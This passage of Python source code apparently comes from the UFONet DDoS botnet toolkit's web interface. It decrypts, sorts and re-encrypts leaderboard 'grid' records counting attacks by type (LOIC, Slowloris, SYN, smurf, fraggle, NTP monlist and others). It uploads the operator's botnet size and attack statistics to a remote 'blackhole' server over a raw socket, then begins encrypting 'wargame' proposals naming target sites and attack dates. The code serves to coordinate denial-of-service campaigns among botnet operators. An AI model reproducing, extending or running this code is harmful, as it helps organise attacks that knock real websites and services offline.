  4973. grid_monlist = nodec_num
  4974. self.decryptedtext = "" # clean decryptedtext buffer
  4975. grid_fraggle = m[17] # fraggle
  4976. self.decrypt(grid_key, grid_fraggle)
  4977. if self.decryptedtext:
  4978. try:
  4979. grid_fraggle = int(self.decryptedtext)
  4980. except:
  4981. grid_fraggle = nodec_num
  4982. else:
  4983. grid_fraggle = nodec_num
  4984. self.decryptedtext = "" # clean decryptedtext buffer
  4985. grid_sniper = m[18] # sniper
  4986. self.decrypt(grid_key, grid_sniper)
  4987. if self.decryptedtext:
  4988. try:
  4989. grid_sniper = int(self.decryptedtext)
  4990. except:
  4991. grid_sniper = nodec_num
  4992. else:
  4993. grid_sniper = nodec_num
  4994. self.decryptedtext = "" # clean decryptedtext buffer
  4995. grid_ufoack = m[19] # ufoack
  4996. self.decrypt(grid_key, grid_ufoack)
  4997. if self.decryptedtext:
  4998. try:
  4999. grid_ufoack = int(self.decryptedtext)
  5000. except:
  5001. grid_ufoack = nodec_num
  5002. else:
  5003. grid_ufoack = nodec_num
  5004. self.decryptedtext = "" # clean decryptedtext buffer
  5005. grid_uforst = m[20] # uforst
  5006. self.decrypt(grid_key, grid_uforst)
  5007. if self.decryptedtext:
  5008. try:
  5009. grid_uforst = int(self.decryptedtext)
  5010. except:
  5011. grid_uforst = nodec_num
  5012. else:
  5013. grid_uforst = nodec_num
  5014. self.decryptedtext = "" # clean decryptedtext buffer
  5015. grid_droper = m[21] # droper
  5016. self.decrypt(grid_key, grid_droper)
  5017. if self.decryptedtext:
  5018. try:
  5019. grid_droper = int(self.decryptedtext)
  5020. except:
  5021. grid_droper = nodec_num
  5022. else:
  5023. grid_droper = nodec_num
  5024. self.decryptedtext = "" # clean decryptedtext buffer
  5025. grid_overlap = m[22] # overlap
  5026. self.decrypt(grid_key, grid_overlap)
  5027. if self.decryptedtext:
  5028. try:
  5029. grid_overlap = int(self.decryptedtext)
  5030. except:
  5031. grid_overlap = nodec_num
  5032. else:
  5033. grid_overlap = nodec_num
  5034. self.decryptedtext = "" # clean decryptedtext buffer
  5035. grid_pinger = m[23] # pinger
  5036. self.decrypt(grid_key, grid_pinger)
  5037. if self.decryptedtext:
  5038. try:
  5039. grid_pinger = int(self.decryptedtext)
  5040. except:
  5041. grid_pinger = nodec_num
  5042. else:
  5043. grid_pinger = nodec_num
  5044. self.decryptedtext = "" # clean decryptedtext buffer
  5045. grid_ufoudp = m[24] # ufoudp
  5046. self.decrypt(grid_key, grid_ufoudp)
  5047. if self.decryptedtext:
  5048. try:
  5049. grid_ufoudp = int(self.decryptedtext)
  5050. except:
  5051. grid_ufoudp = nodec_num
  5052. else:
  5053. grid_ufoudp = nodec_num
  5054. self.decryptedtext = "" # clean decryptedtext buffer
  5055. else:
  5056. grid_monlist = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not monlist present
  5057. self.decrypt(grid_key, grid_monlist)
  5058. if self.decryptedtext:
  5059. try:
  5060. grid_monlist = int(self.decryptedtext)
  5061. except:
  5062. grid_monlist = nodec_num
  5063. else:
  5064. grid_monlist = nodec_num
  5065. self.decryptedtext = "" # clean decryptedtext buffer
  5066. grid_fraggle = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not fraggle present
  5067. self.decrypt(grid_key, grid_fraggle)
  5068. if self.decryptedtext:
  5069. try:
  5070. grid_fraggle = int(self.decryptedtext)
  5071. except:
  5072. grid_fraggle = nodec_num
  5073. else:
  5074. grid_fraggle = nodec_num
  5075. self.decryptedtext = "" # clean decryptedtext buffer
  5076. grid_sniper = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not sniper present
  5077. self.decrypt(grid_key, grid_sniper)
  5078. if self.decryptedtext:
  5079. try:
  5080. grid_sniper = int(self.decryptedtext)
  5081. except:
  5082. grid_sniper = nodec_num
  5083. else:
  5084. grid_sniper = nodec_num
  5085. self.decryptedtext = "" # clean decryptedtext buffer
  5086. grid_ufoack = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not ufoack present
  5087. self.decrypt(grid_key, grid_ufoack)
  5088. if self.decryptedtext:
  5089. try:
  5090. grid_ufoack = int(self.decryptedtext)
  5091. except:
  5092. grid_ufoack = nodec_num
  5093. else:
  5094. grid_ufoack = nodec_num
  5095. self.decryptedtext = "" # clean decryptedtext buffer
  5096. grid_uforst = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not uforst present
  5097. self.decrypt(grid_key, grid_uforst)
  5098. if self.decryptedtext:
  5099. try:
  5100. grid_uforst = int(self.decryptedtext)
  5101. except:
  5102. grid_uforst = nodec_num
  5103. else:
  5104. grid_uforst = nodec_num
  5105. self.decryptedtext = "" # clean decryptedtext buffer
  5106. grid_droper = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not droper present
  5107. self.decrypt(grid_key, grid_droper)
  5108. if self.decryptedtext:
  5109. try:
  5110. grid_droper = int(self.decryptedtext)
  5111. except:
  5112. grid_droper = nodec_num
  5113. else:
  5114. grid_droper = nodec_num
  5115. self.decryptedtext = "" # clean decryptedtext buffer
  5116. grid_overlap = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not overlap present
  5117. self.decrypt(grid_key, grid_overlap)
  5118. if self.decryptedtext:
  5119. try:
  5120. grid_overlap = int(self.decryptedtext)
  5121. except:
  5122. grid_overlap = nodec_num
  5123. else:
  5124. grid_overlap = nodec_num
  5125. self.decryptedtext = "" # clean decryptedtext buffer
  5126. grid_pinger = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not pinger present
  5127. self.decrypt(grid_key, grid_pinger)
  5128. if self.decryptedtext:
  5129. try:
  5130. grid_pinger = int(self.decryptedtext)
  5131. except:
  5132. grid_pinger = nodec_num
  5133. else:
  5134. grid_pinger = nodec_num
  5135. self.decryptedtext = "" # clean decryptedtext buffer
  5136. grid_ufoudp = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not ufoudp present
  5137. self.decrypt(grid_key, grid_ufoudp)
  5138. if self.decryptedtext:
  5139. try:
  5140. grid_ufoudp = int(self.decryptedtext)
  5141. except:
  5142. grid_ufoudp = nodec_num
  5143. else:
  5144. grid_ufoudp = nodec_num
  5145. self.decryptedtext = "" # clean decryptedtext buffer
  5146. if version > 17:
  5147. grid_contact = m[25] # contact
  5148. self.decrypt(grid_key, grid_contact)
  5149. if self.decryptedtext:
  5150. grid_contact = self.decryptedtext
  5151. else:
  5152. grid_contact = nodec_text
  5153. self.decryptedtext = "" # clean decryptedtext buffer
  5154. grid_id = m[26] # id
  5155. elif version == 17:
  5156. grid_contact = m[16] # contact
  5157. self.decrypt(grid_key, grid_contact)
  5158. if self.decryptedtext:
  5159. grid_contact = self.decryptedtext
  5160. else:
  5161. grid_contact = nodec_text
  5162. self.decryptedtext = "" # clean decryptedtext buffer
  5163. grid_id = m[17] # id
  5164. elif version == 16:
  5165. grid_contact = m[15] # contact
  5166. self.decrypt(grid_key, grid_contact)
  5167. if self.decryptedtext:
  5168. grid_contact = self.decryptedtext
  5169. else:
  5170. grid_contact = nodec_text
  5171. self.decryptedtext = "" # clean decryptedtext buffer
  5172. grid_id = m[16] # id
  5173. elif version == 15:
  5174. grid_contact = m[14] # contact
  5175. self.decrypt(grid_key, grid_contact)
  5176. if self.decryptedtext:
  5177. grid_contact = self.decryptedtext
  5178. else:
  5179. grid_contact = nodec_text
  5180. self.decryptedtext = "" # clean decryptedtext buffer
  5181. grid_id = m[15] # id
  5182. elif version == 12:
  5183. grid_contact = m[11] # contact
  5184. self.decrypt(grid_key, grid_contact)
  5185. if self.decryptedtext:
  5186. grid_contact = self.decryptedtext
  5187. else:
  5188. grid_contact = nodec_text
  5189. self.decryptedtext = "" # clean decryptedtext buffer
  5190. grid_id = m[12] # id
  5191. elif version == 11:
  5192. grid_contact = m[10] # contact
  5193. self.decrypt(grid_key, grid_contact)
  5194. if self.decryptedtext:
  5195. grid_contact = self.decryptedtext
  5196. else:
  5197. grid_contact = nodec_text
  5198. self.decryptedtext = "" # clean decryptedtext buffer
  5199. grid_id = m[11] # id
  5200. elif version == 10:
  5201. grid_contact = m[9] # contact
  5202. self.decrypt(grid_key, grid_contact)
  5203. if self.decryptedtext:
  5204. grid_contact = self.decryptedtext
  5205. else:
  5206. grid_contact = nodec_text
  5207. self.decryptedtext = "" # clean decryptedtext buffer
  5208. grid_id = m[10] # id
  5209. else:
  5210. grid_contact = nodec_text
  5211. grid_id = '6666666666666666666666666666666666666' # fake id
  5212. grid_items.append([str(grid_nickname),int(grid_ranking),int(grid_totalchargo),int(grid_dorking),int(grid_transferred),int(grid_maxchargo),int(grid_missions),int(grid_attacks),int(grid_loic),int(grid_loris),int(grid_ufosyn),int(grid_spray),int(grid_smurf),int(grid_xmas),int(grid_nuke),int(grid_tachyon),int(grid_monlist),int(grid_fraggle),int(grid_sniper),int(grid_ufoack),int(grid_uforst),int(grid_droper),int(grid_overlap),int(grid_pinger),int(grid_ufoudp),str(grid_contact),str(grid_id)])
  5213. if grid_filter == "nickname":
  5214. grid_items=sorted(grid_items,key=lambda x:x[0]) # sorted by nickname
  5215. elif grid_filter == "ranking":
  5216. grid_items=sorted(grid_items,key=lambda x:x[1]) # sorted by ranking
  5217. elif grid_filter == "chargo":
  5218. grid_items=sorted(grid_items,key=lambda x:x[2]) # sorted by totalchargo
  5219. elif grid_filter == "dorking":
  5220. grid_items=sorted(grid_items,key=lambda x:x[3]) # sorted by dorking
  5221. elif grid_filter == "transferred":
  5222. grid_items=sorted(grid_items,key=lambda x:x[4]) # sorted by transferred
  5223. elif grid_filter == "maxchargo":
  5224. grid_items=sorted(grid_items,key=lambda x:x[5]) # sorted by maxchargo
  5225. elif grid_filter == "missions":
  5226. grid_items=sorted(grid_items,key=lambda x:x[6]) # sorted by missions
  5227. elif grid_filter == "attacks":
  5228. grid_items=sorted(grid_items,key=lambda x:x[7]) # sorted by attacks
  5229. elif grid_filter == "loic":
  5230. grid_items=sorted(grid_items,key=lambda x:x[8]) # sorted by loic
  5231. elif grid_filter == "loris":
  5232. grid_items=sorted(grid_items,key=lambda x:x[9]) # sorted by loris
  5233. elif grid_filter == "ufosyn":
  5234. grid_items=sorted(grid_items,key=lambda x:x[10]) # sorted by ufosyn
  5235. elif grid_filter == "spray":
  5236. grid_items=sorted(grid_items,key=lambda x:x[11]) # sorted by spray
  5237. elif grid_filter == "smurf":
  5238. grid_items=sorted(grid_items,key=lambda x:x[12]) # sorted by smurf
  5239. elif grid_filter == "xmas":
  5240. grid_items=sorted(grid_items,key=lambda x:x[13]) # sorted by xmas
  5241. elif grid_filter == "nuke":
  5242. grid_items=sorted(grid_items,key=lambda x:x[14]) # sorted by nuke
  5243. elif grid_filter == "tachyon":
  5244. grid_items=sorted(grid_items,key=lambda x:x[15]) # sorted by tachyon
  5245. elif grid_filter == "monlist":
  5246. grid_items=sorted(grid_items,key=lambda x:x[16]) # sorted by monlist
  5247. elif grid_filter == "fraggle":
  5248. grid_items=sorted(grid_items,key=lambda x:x[17]) # sorted by fraggle
  5249. elif grid_filter == "sniper":
  5250. grid_items=sorted(grid_items,key=lambda x:x[18]) # sorted by sniper
  5251. elif grid_filter == "ufoack":
  5252. grid_items=sorted(grid_items,key=lambda x:x[19]) # sorted by ufoack
  5253. elif grid_filter == "uforst":
  5254. grid_items=sorted(grid_items,key=lambda x:x[20]) # sorted by uforst
  5255. elif grid_filter == "droper":
  5256. grid_items=sorted(grid_items,key=lambda x:x[21]) # sorted by droper
  5257. elif grid_filter == "overlap":
  5258. grid_items=sorted(grid_items,key=lambda x:x[22]) # sorted by overlap
  5259. elif grid_filter == "pinger":
  5260. grid_items=sorted(grid_items,key=lambda x:x[23]) # sorted by pinger
  5261. elif grid_filter == "ufoudp":
  5262. grid_items=sorted(grid_items,key=lambda x:x[24]) # sorted by ufoudp
  5263. elif grid_filter == "contact":
  5264. grid_items=sorted(grid_items,key=lambda x:x[25]) # sorted by contact
  5265. else:
  5266. grid_items=sorted(grid_items,key=lambda x:x[6]) # sorted by missions (default)
  5267. for i in grid_items:
  5268. grid_nickname = str(i[0])
  5269. self.encrypt(grid_key, grid_nickname)
  5270. if self.encryptedtext:
  5271. grid_nickname = self.encryptedtext
  5272. self.encryptedtext = "" # clean encryptedtext buffer
  5273. grid_ranking = str(i[1])
  5274. self.encrypt(grid_key, grid_ranking)
  5275. if self.encryptedtext:
  5276. grid_ranking = self.encryptedtext
  5277. self.encryptedtext = "" # clean encryptedtext buffer
  5278. grid_totalchargo = str(i[2])
  5279. self.encrypt(grid_key, grid_totalchargo)
  5280. if self.encryptedtext:
  5281. grid_totalchargo = self.encryptedtext
  5282. self.encryptedtext = "" # clean encryptedtext buffer
  5283. grid_dorking = str(i[3])
  5284. self.encrypt(grid_key, grid_dorking)
  5285. if self.encryptedtext:
  5286. grid_dorking = self.encryptedtext
  5287. self.encryptedtext = "" # clean encryptedtext buffer
  5288. grid_transferred = str(i[4])
  5289. self.encrypt(grid_key, grid_transferred)
  5290. if self.encryptedtext:
  5291. grid_transferred = self.encryptedtext
  5292. self.encryptedtext = "" # clean encryptedtext buffer
  5293. grid_maxchargo = str(i[5])
  5294. self.encrypt(grid_key, grid_maxchargo)
  5295. if self.encryptedtext:
  5296. grid_maxchargo = self.encryptedtext
  5297. self.encryptedtext = "" # clean encryptedtext buffer
  5298. grid_missions = str(i[6])
  5299. self.encrypt(grid_key, grid_missions)
  5300. if self.encryptedtext:
  5301. grid_missions = self.encryptedtext
  5302. self.encryptedtext = "" # clean encryptedtext buffer
  5303. grid_attacks = str(i[7])
  5304. self.encrypt(grid_key, grid_attacks)
  5305. if self.encryptedtext:
  5306. grid_attacks = self.encryptedtext
  5307. self.encryptedtext = "" # clean encryptedtext buffer
  5308. grid_loic = str(i[8])
  5309. self.encrypt(grid_key, grid_loic)
  5310. if self.encryptedtext:
  5311. grid_loic = self.encryptedtext
  5312. self.encryptedtext = "" # clean encryptedtext buffer
  5313. grid_loris = str(i[9])
  5314. self.encrypt(grid_key, grid_loris)
  5315. if self.encryptedtext:
  5316. grid_loris = self.encryptedtext
  5317. self.encryptedtext = "" # clean encryptedtext buffer
  5318. grid_ufosyn = str(i[10])
  5319. self.encrypt(grid_key, grid_ufosyn)
  5320. if self.encryptedtext:
  5321. grid_ufosyn = self.encryptedtext
  5322. self.encryptedtext = "" # clean encryptedtext buffer
  5323. grid_spray = str(i[11])
  5324. self.encrypt(grid_key, grid_spray)
  5325. if self.encryptedtext:
  5326. grid_spray = self.encryptedtext
  5327. self.encryptedtext = "" # clean encryptedtext buffer
  5328. grid_smurf = str(i[12])
  5329. self.encrypt(grid_key, grid_smurf)
  5330. if self.encryptedtext:
  5331. grid_smurf = self.encryptedtext
  5332. self.encryptedtext = "" # clean encryptedtext buffer
  5333. grid_xmas = str(i[13])
  5334. self.encrypt(grid_key, grid_xmas)
  5335. if self.encryptedtext:
  5336. grid_xmas = self.encryptedtext
  5337. self.encryptedtext = "" # clean encryptedtext buffer
  5338. grid_nuke = str(i[14])
  5339. self.encrypt(grid_key, grid_nuke)
  5340. if self.encryptedtext:
  5341. grid_nuke = self.encryptedtext
  5342. self.encryptedtext = "" # clean encryptedtext buffer
  5343. grid_tachyon = str(i[15])
  5344. self.encrypt(grid_key, grid_tachyon)
  5345. if self.encryptedtext:
  5346. grid_tachyon = self.encryptedtext
  5347. self.encryptedtext = "" # clean encryptedtext buffer
  5348. grid_monlist = str(i[16])
  5349. self.encrypt(grid_key, grid_monlist)
  5350. if self.encryptedtext:
  5351. grid_monlist = self.encryptedtext
  5352. self.encryptedtext = "" # clean encryptedtext buffer
  5353. grid_fraggle = str(i[17])
  5354. self.encrypt(grid_key, grid_fraggle)
  5355. if self.encryptedtext:
  5356. grid_fraggle = self.encryptedtext
  5357. self.encryptedtext = "" # clean encryptedtext buffer
  5358. grid_sniper = str(i[18])
  5359. self.encrypt(grid_key, grid_sniper)
  5360. if self.encryptedtext:
  5361. grid_sniper = self.encryptedtext
  5362. self.encryptedtext = "" # clean encryptedtext buffer
  5363. grid_ufoack = str(i[19])
  5364. self.encrypt(grid_key, grid_ufoack)
  5365. if self.encryptedtext:
  5366. grid_ufoack = self.encryptedtext
  5367. self.encryptedtext = "" # clean encryptedtext buffer
  5368. grid_uforst = str(i[20])
  5369. self.encrypt(grid_key, grid_uforst)
  5370. if self.encryptedtext:
  5371. grid_uforst = self.encryptedtext
  5372. self.encryptedtext = "" # clean encryptedtext buffer
  5373. grid_droper = str(i[21])
  5374. self.encrypt(grid_key, grid_droper)
  5375. if self.encryptedtext:
  5376. grid_droper = self.encryptedtext
  5377. self.encryptedtext = "" # clean encryptedtext buffer
  5378. grid_overlap = str(i[22])
  5379. self.encrypt(grid_key, grid_overlap)
  5380. if self.encryptedtext:
  5381. grid_overlap = self.encryptedtext
  5382. self.encryptedtext = "" # clean encryptedtext buffer
  5383. grid_pinger = str(i[23])
  5384. self.encrypt(grid_key, grid_pinger)
  5385. if self.encryptedtext:
  5386. grid_pinger = self.encryptedtext
  5387. self.encryptedtext = "" # clean encryptedtext buffer
  5388. grid_ufoudp = str(i[24])
  5389. self.encrypt(grid_key, grid_ufoudp)
  5390. if self.encryptedtext:
  5391. grid_ufoudp = self.encryptedtext
  5392. self.encryptedtext = "" # clean encryptedtext buffer
  5393. grid_contact = str(i[25])
  5394. self.encrypt(grid_key, grid_contact)
  5395. if self.encryptedtext:
  5396. grid_contact = self.encryptedtext
  5397. self.encryptedtext = "" # clean encryptedtext buffer
  5398. grid_id = str(i[26]) # id (plain id)
  5399. l = str(grid_nickname) + "#?#" + str(grid_ranking) + "#?#" + str(grid_totalchargo) + "#?#" + str(grid_dorking) + "#?#" + str(grid_transferred) + "#?#" + str(grid_maxchargo) + "#?#" + str(grid_missions) + "#?#" + str(grid_attacks) + "#?#" + str(grid_loic) + "#?#" + str(grid_loris) + "#?#" + str(grid_ufosyn) + "#?#" + str(grid_spray) + "#?#" + str(grid_smurf)+ "#?#" + str(grid_xmas) + "#?#" + str(grid_nuke) + "#?#" + str(grid_tachyon) + "#?#" + str(grid_monlist) + "#?#" + str(grid_fraggle) + "#?#" + str(grid_sniper) + "#?#" + str(grid_ufoack) + "#?#" + str(grid_uforst) + "#?#" + str(grid_droper) + "#?#" + str(grid_overlap) + "#?#" + str(grid_pinger) + "#?#" + str(grid_ufoudp) + "#?#" + str(grid_contact) + "#?#" + str(grid_id)
  5400. f.write(l + os.linesep)
  5401. f.close()
  5402. except:
  5403. pass
  5404. if page == "/cmd_grid_filter_update":
  5405. if not os.path.exists('/tmp/out'):
  5406. open('/tmp/out', 'w').close()
  5407. with open('/tmp/out', 'r') as f:
  5408. self.pages["/cmd_grid_filter_update"] = "<pre>"+f.read()+"<pre>"
  5409. if page == "/cmd_transfer_grid":
  5410. self.pages["/cmd_transfer_grid"] = "<pre>Waiting for 'blackhole' connection...</pre>"
  5411. blackhole_ip = pGet["grid_source"]
  5412. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  5413. try:
  5414. grid_key = pGet["grid_key"]
  5415. except:
  5416. grid_key = ""
  5417. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5418. if grid_key is not "": # stream creation + encryption + package send
  5419. try:
  5420. grid_json_file = open(self.mothership_gridcfg_file, "r") # extract grid profile conf
  5421. grid_data = json.load(grid_json_file)
  5422. grid_json_file.close()
  5423. stats_json_file = open(self.mothership_stats_file, "r") # extract mothership stats
  5424. stats_data = json.load(stats_json_file)
  5425. stats_json_file.close()
  5426. nickname = grid_data["grid_nick"].encode('utf-8')
  5427. self.encrypt(grid_key, nickname)
  5428. if self.encryptedtext:
  5429. nickname = self.encryptedtext
  5430. self.encryptedtext = "" # clean encryptedtext buffer
  5431. ranking = self.ranking
  5432. if ranking == "Rookie":
  5433. ranking = 1
  5434. elif ranking == "Mercenary":
  5435. ranking = 2
  5436. elif ranking == "Bandit":
  5437. ranking = 3
  5438. elif ranking == "UFOmmander!":
  5439. ranking = 4
  5440. elif ranking == "UFOl33t!":
  5441. ranking = 5
  5442. else:
  5443. ranking = 1
  5444. self.encrypt(grid_key, str(ranking))
  5445. if self.encryptedtext:
  5446. ranking = self.encryptedtext
  5447. self.encryptedtext = "" # clean encryptedtext buffer
  5448. chargo = self.total_botnet
  5449. self.encrypt(grid_key, str(chargo))
  5450. if self.encryptedtext:
  5451. chargo = self.encryptedtext
  5452. self.encryptedtext = "" # clean encryptedtext buffer
  5453. dorking = stats_data["scanner"]
  5454. self.encrypt(grid_key, str(dorking))
  5455. if self.encryptedtext:
  5456. dorking = self.encryptedtext
  5457. self.encryptedtext = "" # clean encryptedtext buffer
  5458. transferred = stats_data["transferred"]
  5459. self.encrypt(grid_key, str(transferred))
  5460. if self.encryptedtext:
  5461. transferred = self.encryptedtext
  5462. self.encryptedtext = "" # clean encryptedtext buffer
  5463. max_chargo = stats_data["max_chargo"]
  5464. self.encrypt(grid_key, str(max_chargo))
  5465. if self.encryptedtext:
  5466. max_chargo = self.encryptedtext
  5467. self.encryptedtext = "" # clean encryptedtext buffer
  5468. missions = stats_data["missions"]
  5469. self.encrypt(grid_key, str(missions))
  5470. if self.encryptedtext:
  5471. missions = self.encryptedtext
  5472. self.encryptedtext = "" # clean encryptedtext buffer
  5473. attacks = stats_data["completed"]
  5474. self.encrypt(grid_key, str(attacks))
  5475. if self.encryptedtext:
  5476. attacks = self.encryptedtext
  5477. self.encryptedtext = "" # clean encryptedtext buffer
  5478. loic = stats_data["loic"]
  5479. self.encrypt(grid_key, str(loic))
  5480. if self.encryptedtext:
  5481. loic = self.encryptedtext
  5482. self.encryptedtext = "" # clean encryptedtext buffer
  5483. loris = stats_data["loris"]
  5484. self.encrypt(grid_key, str(loris))
  5485. if self.encryptedtext:
  5486. loris = self.encryptedtext
  5487. self.encryptedtext = "" # clean encryptedtext buffer
  5488. ufosyn = stats_data["ufosyn"]
  5489. self.encrypt(grid_key, str(ufosyn))
  5490. if self.encryptedtext:
  5491. ufosyn = self.encryptedtext
  5492. self.encryptedtext = "" # clean encryptedtext buffer
  5493. spray = stats_data["spray"]
  5494. self.encrypt(grid_key, str(spray))
  5495. if self.encryptedtext:
  5496. spray = self.encryptedtext
  5497. self.encryptedtext = "" # clean encryptedtext buffer
  5498. smurf = stats_data["smurf"]
  5499. self.encrypt(grid_key, str(smurf))
  5500. if self.encryptedtext:
  5501. smurf = self.encryptedtext
  5502. self.encryptedtext = "" # clean encryptedtext buffer
  5503. xmas = stats_data["xmas"]
  5504. self.encrypt(grid_key, str(xmas))
  5505. if self.encryptedtext:
  5506. xmas = self.encryptedtext
  5507. self.encryptedtext = "" # clean encryptedtext buffer
  5508. nuke = stats_data["nuke"]
  5509. self.encrypt(grid_key, str(nuke))
  5510. if self.encryptedtext:
  5511. nuke = self.encryptedtext
  5512. self.encryptedtext = "" # clean encryptedtext buffer
  5513. tachyon = stats_data["tachyon"]
  5514. self.encrypt(grid_key, str(tachyon))
  5515. if self.encryptedtext:
  5516. tachyon = self.encryptedtext
  5517. self.encryptedtext = "" # clean encryptedtext buffer
  5518. monlist = stats_data["monlist"]
  5519. self.encrypt(grid_key, str(monlist))
  5520. if self.encryptedtext:
  5521. monlist = self.encryptedtext
  5522. self.encryptedtext = "" # clean encryptedtext buffer
  5523. fraggle = stats_data["fraggle"]
  5524. self.encrypt(grid_key, str(fraggle))
  5525. if self.encryptedtext:
  5526. fraggle = self.encryptedtext
  5527. self.encryptedtext = "" # clean encryptedtext buffer
  5528. sniper = stats_data["sniper"]
  5529. self.encrypt(grid_key, str(sniper))
  5530. if self.encryptedtext:
  5531. sniper = self.encryptedtext
  5532. self.encryptedtext = "" # clean encryptedtext buffer
  5533. ufoack = stats_data["ufoack"]
  5534. self.encrypt(grid_key, str(ufoack))
  5535. if self.encryptedtext:
  5536. ufoack = self.encryptedtext
  5537. self.encryptedtext = "" # clean encryptedtext buffer
  5538. uforst = stats_data["uforst"]
  5539. self.encrypt(grid_key, str(uforst))
  5540. if self.encryptedtext:
  5541. uforst = self.encryptedtext
  5542. self.encryptedtext = "" # clean encryptedtext buffer
  5543. droper = stats_data["droper"]
  5544. self.encrypt(grid_key, str(droper))
  5545. if self.encryptedtext:
  5546. droper = self.encryptedtext
  5547. self.encryptedtext = "" # clean encryptedtext buffer
  5548. overlap = stats_data["overlap"]
  5549. self.encrypt(grid_key, str(overlap))
  5550. if self.encryptedtext:
  5551. overlap = self.encryptedtext
  5552. self.encryptedtext = "" # clean encryptedtext buffer
  5553. pinger = stats_data["pinger"]
  5554. self.encrypt(grid_key, str(pinger))
  5555. if self.encryptedtext:
  5556. pinger = self.encryptedtext
  5557. self.encryptedtext = "" # clean encryptedtext buffer
  5558. ufoudp = stats_data["ufoudp"]
  5559. self.encrypt(grid_key, str(ufoudp))
  5560. if self.encryptedtext:
  5561. ufoudp = self.encryptedtext
  5562. self.encryptedtext = "" # clean encryptedtext buffer
  5563. contact = grid_data["grid_contact"].encode('utf-8')
  5564. self.encrypt(grid_key, str(contact))
  5565. if self.encryptedtext:
  5566. contact = self.encryptedtext
  5567. self.encryptedtext = "" # clean encryptedtext buffer
  5568. id = grid_data["grid_token"] # plain text
  5569. stream = str(nickname)+grid_msg_sep+str(ranking)+grid_msg_sep+str(chargo)+grid_msg_sep+str(dorking)+grid_msg_sep+str(transferred)+grid_msg_sep+str(max_chargo)+grid_msg_sep+str(missions)+grid_msg_sep+str(attacks)+grid_msg_sep+str(loic)+grid_msg_sep+str(loris)+grid_msg_sep+str(ufosyn)+grid_msg_sep+str(spray)+grid_msg_sep+str(smurf)+grid_msg_sep+str(xmas)+grid_msg_sep+str(nuke)+grid_msg_sep+str(tachyon)+grid_msg_sep+str(monlist)+grid_msg_sep+str(fraggle)+grid_msg_sep+str(sniper)+grid_msg_sep+str(ufoack)+grid_msg_sep+str(uforst)+grid_msg_sep+str(droper)+grid_msg_sep+str(overlap)+grid_msg_sep+str(pinger)+grid_msg_sep+str(ufoudp)+grid_msg_sep+str(contact)+grid_msg_sep+str(id)
  5570. try:
  5571. host = blackhole_ip
  5572. cport = 9992 # port used by mothership grider (server side script)
  5573. gs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5574. gs.settimeout(5.0)
  5575. gs.connect((host, cport))
  5576. gs.send(stream)
  5577. gs.close()
  5578. try: # download latest grid after submit
  5579. grid = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/grid.txt').read().decode('utf-8')
  5580. f = open(self.grid_file, "w") # write updates to grid.txt
  5581. f.write(grid)
  5582. f.close()
  5583. except:
  5584. pass
  5585. grid_trans = "[Info] [AI] Statistics transferred! -> [OK!]\n"
  5586. except:
  5587. grid_trans = "[Error] [AI] Something wrong uploading statistics. Try it again...\n"
  5588. except:
  5589. grid_trans = "[Error] [AI] Something wrong uploading statistics. Try it again...\n"
  5590. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5591. f = open("/tmp/out", "w")
  5592. f.write(grid_trans)
  5593. f.write(end_mark)
  5594. f.close()
  5595. if page == "/cmd_transfer_grid_update":
  5596. if not os.path.exists('/tmp/out'):
  5597. open('/tmp/out', 'w').close()
  5598. with open('/tmp/out', 'r') as f:
  5599. self.pages["/cmd_transfer_grid_update"] = "<pre>"+f.read()+"<pre>"
  5600. if page == "/cmd_transfer_wargame":
  5601. self.pages["/cmd_transfer_wargame"] = "<pre>Waiting for 'blackhole' connection...</pre>"
  5602. blackhole_ip = pGet["wargames_source2"]
  5603. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  5604. try:
  5605. wargames_enckey = pGet["wargames_enckey"]
  5606. except:
  5607. wargames_enckey = ""
  5608. wargames_creation = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  5609. wargames_target = pGet["wargames_target"]
  5610. if wargames_target.startswith("http://") or wargames_target.startswith("https://"): # parse proposed target url
  5611. t = urlparse(wargames_target)
  5612. wargames_target = t.netloc
  5613. else:
  5614. wargames_trans = "[Error] [AI] Proposed target hasn't a correct format!. Try it again...\n"
  5615. wargames_enckey = ""
  5616. if wargames_target.startswith("www."):
  5617. wargames_target = wargames_target.replace("www.","")
  5618. wargames_estimated = pGet["wargames_estimated"]
  5619. try:
  5620. wargames_creation = strptime(wargames_creation, "%d-%m-%Y %H:%M:%S")
  5621. wargames_estimated = strptime(wargames_estimated, "%d-%m-%Y %H:%M:%S")
  5622. if (wargames_creation > wargames_estimated) == True: # parse bad dates
  5623. wargames_trans = "[Error] [AI] Date time should be major than creation time. Try it again...\n"
  5624. wargames_enckey = ""
  5625. except:
  5626. wargames_trans = "[Error] [AI] Date time is not using a correct format!. Try it again...\n"
  5627. wargames_enckey = ""
  5628. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5629. if wargames_enckey is not "": # stream creation + encryption + package send
  5630. wargames_creation = strftime("%d-%m-%Y %H:%M:%S", wargames_creation)
  5631. wargames_estimated = strftime("%d-%m-%Y %H:%M:%S", wargames_estimated)
  5632. try:
  5633. self.encrypt(wargames_enckey, wargames_creation)
  5634. if self.encryptedtext:
  5635. wargames_creation = self.encryptedtext
  5636. self.encryptedtext = "" # clean encryptedtext buffer
  5637. self.encrypt(wargames_enckey, wargames_target)
  5638. if self.encryptedtext:
  5639. wargames_target = self.encryptedtext
